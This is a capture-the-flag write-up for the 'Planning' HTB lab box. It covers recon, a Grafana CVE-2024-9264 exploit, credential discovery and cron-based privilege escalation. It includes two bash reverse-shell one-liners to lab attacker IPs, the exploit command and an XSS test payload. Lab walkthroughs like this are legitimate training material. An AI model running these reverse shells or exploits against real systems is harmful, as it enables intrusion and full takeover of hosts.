Planning

Easy Linux HTB box with the given credentials: admin | 0D5oT70Fq13EvB5r

Reconnaissance

As always, we start off by performing a basic Nmap scan

nmap -sCV -p- --open -Pn -n -sS --min-rate 5000 -oN Scan 10.10.11.68

As we can see we found ports: 80 | HTTP and 22 | SSH and the OS: Ubuntu

We can also notice that this web page is using Virtual Hosting to planning.htb. So we edit our /etc/hosts file and it redirects us succesfully.

Using whatweb we find the following technologies for the web page

We can see the title "Edukate - Online Education Website" which we visit on our browser

After navigating we find a "Contact" form but doesn't appear to be useful, so well move into the next section: Directory Bruteforcing with gobuster with the -x php flag as we know it is using PHP

gobuster dir -u http://planning.htb -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php

We don't seem to find anyththing important on our directory brute-forcing so we move on to the subdirectory brute-forcing with gobuster again

gobuster dns -d planning.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

But we don't seem to find anything useful either

We try to intercept the HTTP traffic using BurpSuite on the /enroll.php directory

Trying to see if this form is vulnerable to XSS using the payload <script>alert(1)</script>

We see it gives us an error (500 Internal Server Error) but it doesn't seem vulnerable to XSS because it doesnt reflect on screen, it just gives us a blank page where we see that the web is crashing.

We try again bruteforcing the directories and subdirectories with gobuster using other wordlists and finally, we find a subdirectory grafana.planning.htb

We add id to our /etc/hosts file and open it on our browser

We get a log in panel with the title "Grafana" we login with the given credentials admin:0D5oT70Fq13EvB5r

Exploiting Grafana

We log in into a dashboard panel

We find nothing useful when exploring the dashboard, we proceed to find exploits and we find a available exploit on GitHub: CVE-2024-9264

LogoGitHub - nollium/CVE-2024-9264: Exploit for Grafana arbitrary file-read (CVE-2024-9264)GitHub

We download the Python script from the Github repo, install the dependencies and run the command

We see that we can enumerate the /etc/passwd file using the exploit, and we also can use this exploit to inject commands, so we proceed to get a reverse shell on our system

We execute the following command

python cve.py -u admin -p 0D5oT70Fq13EvB5r -c 'bash -c "bash -i >& /dev/tcp/10.10.14.225/1336 0>&1"' http://grafana.planning.htb/

asd

And we successfully get a reverse shell as root!

We don't find any flags so we know this is likely because we are inside a Docker container

Privilege Escalation

After checking the environment variables, we find this:

We can see there is a plaintext password: RioTecRANDEntANT! and a username enzo

We try to login through ssh to this user...

Success! We got to login into the enzo user using SSH

We can see the user flag there and we also see a linux privilege escalation script we all know: linpeas.sh so we proceed to use it with the command bash linpeas.sh, where we found that we've got a web server running on TCP Port 8000

we perform port forwarding through localhost:8000 using

ssh -L 8000:localhost:8000 enzo@planning.htb

And it asks us for a username and password

Investigating through the file s ystem, we found /opt/crontabs/crontab.db containing a password: P4ssw0rdS0pRi0T3c

We find a Conrjobs dashboard, in where we select + New and add our own cronjob:

We set a cron job that sends every minute a reverse shell on port 1337 to our attacker's ip

After multiple tries we find that the only command that works is

bash -c 'exec bash -i &>/dev/tcp/10.10.14.99/1337 <&1'

And finally, we get the root flag!!

PreviousSoccerNextNocturnal

Last updated